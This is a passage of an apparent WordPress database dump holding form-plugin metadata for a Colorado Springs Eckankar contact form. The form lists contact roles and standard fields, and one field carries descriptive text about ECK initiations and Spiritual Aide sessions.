Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:1;}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"CFO\";s:5:\"value\";s:3:\"CFO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:2;}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:17:\"Class Coordinator\";s:5:\"value\";s:17:\"Class Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:3;}i:4;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"Communication Coordinator\";s:5:\"value\";s:25:\"Communication Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:4;}i:5;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:17:\"Database Director\";s:5:\"value\";s:17:\"Database Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:5;}i:6;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:26:\"Family & Youth Coordinator\";s:5:\"value\";s:28:\"family-and-youth-coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:6;}i:7;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"President\";s:5:\"value\";s:9:\"President\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:7;}i:8;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"RESA\";s:5:\"value\";s:4:\"RESA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:8;}i:9;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:9;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:10;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:15:\"Vahana Director\";s:5:\"value\";s:15:\"Vahana Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:10;}}'),(10031,74,'drawerDisabled','','drawerDisabled',''),(8448,108,'field_label','Text','field_label','Text'),(8449,108,'field_key','html_117','field_key','html_117'),(8450,109,'field_label','First Name','field_label','First Name'),(8451,109,'field_key','textbox_118','field_key','textbox_118'),(8452,109,'value','','value',''),(8453,110,'field_label','Last Name','field_label','Last Name'),(8454,110,'field_key','lastname_119','field_key','lastname_119'),(8455,110,'value','','value',''),(8456,111,'field_label','Email','field_label','Email'),(8457,111,'field_key','email_120','field_key','email_120'),(8458,111,'value','','value',''),(8459,112,'field_label','Phone','field_label','Phone'),(3281,104,'key','listselect_15','key','listselect_15'),(3282,104,'container_class','','container_class',''),(3283,104,'parent_id','10','parent_id','10'),(3284,105,'objectType','Field','objectType','Field'),(3285,105,'objectDomain','fields','objectDomain','fields'),(3286,105,'editActive','','editActive',''),(3287,105,'order','10','order','10'),(3288,105,'type','textarea','type','textarea'),(3289,105,'label','Enter Your Message Here','label','Enter Your Message Here'),(3290,105,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3291,105,'label_pos','above','label_pos','above'),(3292,105,'default_value','','default_value',''),(3293,105,'textarea_rte','0','textarea_rte','0'),(3294,105,'textarea_media','0','textarea_media','0'),(3295,105,'disable_rte_mobile','0','disable_rte_mobile','0'),(3296,105,'input_limit','','input_limit',''),(3297,105,'input_limit_type','char','input_limit_type','char'),(3298,105,'calc_auto_include','0','calc_auto_include','0'),(3299,105,'num_sort','0','num_sort','0'),(3300,105,'admin_label','','admin_label',''),(3301,105,'show_help','0','show_help','0'),(3302,105,'help_text','','help_text',''),(3303,105,'show_desc','0','show_desc','0'),(3304,105,'desc_pos','none','desc_pos','none'),(3305,105,'desc_text','','desc_text',''),(3306,105,'element_class','','element_class',''),(3307,105,'required','1','required','1'),(3308,105,'default','','default',''),(3309,105,'key','textarea_16','key','textarea_16'),(3310,105,'placeholder','','placeholder',''),(3311,105,'container_class','','container_class',''),(3312,105,'manual_key','','manual_key',''),(3313,105,'parent_id','10','parent_id','10'),(17562,630,'element_class','','element_class',''),(17561,630,'container_class','','container_class',''),(17560,630,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17559,630,'type','html','type','html'),(17558,630,'label','HTML','label','HTML'),(17557,630,'idAttribute','id','idAttribute','id'),(17556,630,'order','11','order','11'),(3331,107,'objectType','Field','objectType','Field'),(3332,107,'objectDomain','fields','objectDomain','fields'),(3333,107,'editActive','','editActive',''),(3334,107,'order','12','order','12'),(3335,107,'type','submit','type','submit'),(3336,107,'label','Submit','label','Submit'),(3337,107,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3338,107,'show_help','0','show_help','0'),(3339,107,'help_text','','help_text',''),(3340,107,'show_desc','0','show_desc','0'),(3341,107,'desc_pos','none','desc_pos','none'),(3342,107,'desc_text','','desc_text',''),(3343,107,'processing_label','Processing','processing_label','Processing'),(3344,107,'element_class','','element_class',''),(3345,107,'key','submit_12','key','submit_12'),(3346,107,'container_class','','container_class',''),(3347,107,'parent_id','10','parent_id','10'),(3348,108,'objectType','Field','objectType','Field'),(3349,108,'objectDomain','fields','objectDomain','fields'),(3350,108,'editActive','','editActive',''),(3351,108,'order','1','order','1'),(3352,108,'type','html','type','html'),(3353,108,'label','Text','label','Text'),(3354,108,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3355,108,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(3356,108,'desc_el','div','desc_el','div'),(3357,108,'show_desc','0','show_desc','0'),(3358,108,'desc_pos','none','desc_pos','none'),(3359,108,'desc_text','','desc_text',''),(3360,108,'element_class','','element_class',''),(3361,108,'default','<p><p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p><p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(3362,108,'key','html_117','key','html_117'),(3363,108,'container_class','','container_class',''),(3364,108,'drawerDisabled','','drawerDisabled',''),(3365,108,'parent_id','11','parent_id','11'),(3366,109,'objectType','Field','objectType','Field'),(3367,109,'objectDomain','fields','objectDomain','fields'),(3368,109,'editActive','','editActive',''),(3369,109,'order','2','order','2'),(3370,109,'type','textbox','type','textbox'),(3371,109,'def_id','6','def_id','6'),(3372,109,'label','First Name','label','First Name'),(3373,109,'label_pos','above','label_pos','above'),(3374,109,'mask','','mask',''),(3375,109,'datepicker','0','datepicker','0'),(3376,109,'first_name','1','first_name','1'),(3377,109,'last_name','0','last_name','0'),(3378,109,'from_name','0','from_name','0'),(3379,109,'user_info_field_group','1','user_info_field_group','1'),(3380,109,'show_help','0','show_help','0'),(3381,109,'help_text','','help_text',''),(3382,109,'calc_auto_include','0','calc_auto_include','0'),(3383,109,'calc_option','0','calc_option','0'),(3384,109,'placeholder','','placeholder',''),(3385,109,'user_address_1','','user_address_1',''),(3386,109,'user_address_2','','user_address_2',''),(3387,109,'user_city','','user_city',''),(3388,109,'user_zip','','user_zip',''),(3389,109,'user_phone','','user_phone',''),(3390,109,'user_email','','user_email',''),(3391,109,'disable_input','0','disable_input','0'),(3392,109,'input_limit','','input_limit',''),(3393,109,'input_limit_type','char','input_limit_type','char'),(3394,109,'input_limit_msg','','input_limit_msg',''),(3395,109,'user_state','0','user_state','0'),(3396,109,'autocomplete_off','0','autocomplete_off','0'),(3397,109,'num_sort','0','num_sort','0'),(3398,109,'admin_label','','admin_label',''),(3399,109,'user_info_field_group_name','','user_info_field_group_name',''),(3400,109,'user_info_field_group_custom','','user_info_field_group_custom',''),(3401,109,'show_desc','0','show_desc','0'),(3402,109,'desc_pos','none','desc_pos','none'),(3403,109,'desc_text','','desc_text',''),(3404,109,'element_class','','element_class',''),(3405,109,'required','1','required','1'),(3406,109,'key','textbox_118','key','textbox_118'),(3407,109,'default','','default',''),(3408,109,'container_class','one-half first','container_class','one-half first'),(3409,109,'manual_key','','manual_key',''),(3410,109,'custom_mask','','custom_mask',''),(3411,109,'custom_name_attribute','','custom_name_attribute',''),(3412,109,'personally_identifiable','','personally_identifiable',''),(3413,109,'parent_id','11','parent_id','11'),(3414,110,'objectType','Field','objectType','Field'),(3415,110,'objectDomain','fields','objectDomain','fields'),(3416,110,'editActive','','editActive',''),(3417,110,'order','3','order','3'),(3418,110,'type','lastname','type','lastname'),(3419,110,'def_id','7','def_id','7'),(3420,110,'label','Last Name','label','Last Name'),(3421,110,'label_pos','above','label_pos','above'),(3422,110,'mask','','mask',''),(3423,110,'datepicker','0','datepicker','0'),(3424,110,'first_name','0','first_name','0'),(3425,110,'from_name','0','from_name','0'),(3426,110,'user_info_field_group','1','user_info_field_group','1'),(3427,110,'show_help','0','show_help','0'),(3428,110,'help_text','','help_text',''),(3429,110,'calc_auto_include','0','calc_auto_include','0'),(3430,110,'calc_option','0','calc_option','0'),(3431,110,'placeholder','','placeholder',''),(3432,110,'user_address_1','','user_address_1',''),(3433,110,'user_address_2','','user_address_2',''),(3434,110,'user_city','','user_city',''),(3435,110,'user_zip','','user_zip',''),(3436,110,'user_phone','','user_phone',''),(3437,110,'user_email','','user_email',''),(3438,110,'disable_input','0','disable_input','0'),(3439,110,'input_limit','','input_limit',''),(3440,110,'input_limit_type','char','input_limit_type','char'),(3441,110,'input_limit_msg','','input_limit_msg',''),(3442,110,'user_state','0','user_state','0'),(3443,110,'autocomplete_off','0','autocomplete_off','0'),(3444,110,'num_sort','0','num_sort','0'),(3445,110,'admin_label','','admin_label',''),(3446,110,'user_info_field_group_name','','user_info_field_group_name',''),(3447,110,'user_info_field_group_custom','','user_info_field_group_custom',''),(3448,110,'show_desc','0','show_desc','0'),(3449,110,'desc_pos','none','desc_pos','none'),(3450,110,'desc_text','','desc_text',''),(3451,110,'element_class','','element_class',''),(3452,110,'required','1','required','1'),(3453,110,'key','lastname_119','key','lastname_119'),(3454,110,'default','','default',''),(3455,110,'container_class','one-half','container_class','one-half'),(3456,110,'custom_name_attribute','lname','custom_name_attribute','lname'),(3457,110,'personally_identifiable','1','personally_identifiable','1'),(3458,110,'parent_id','11','parent_id','11'),(3459,111,'objectType','Field','objectType','Field'),(3460,111,'objectDomain','fields','objectDomain','f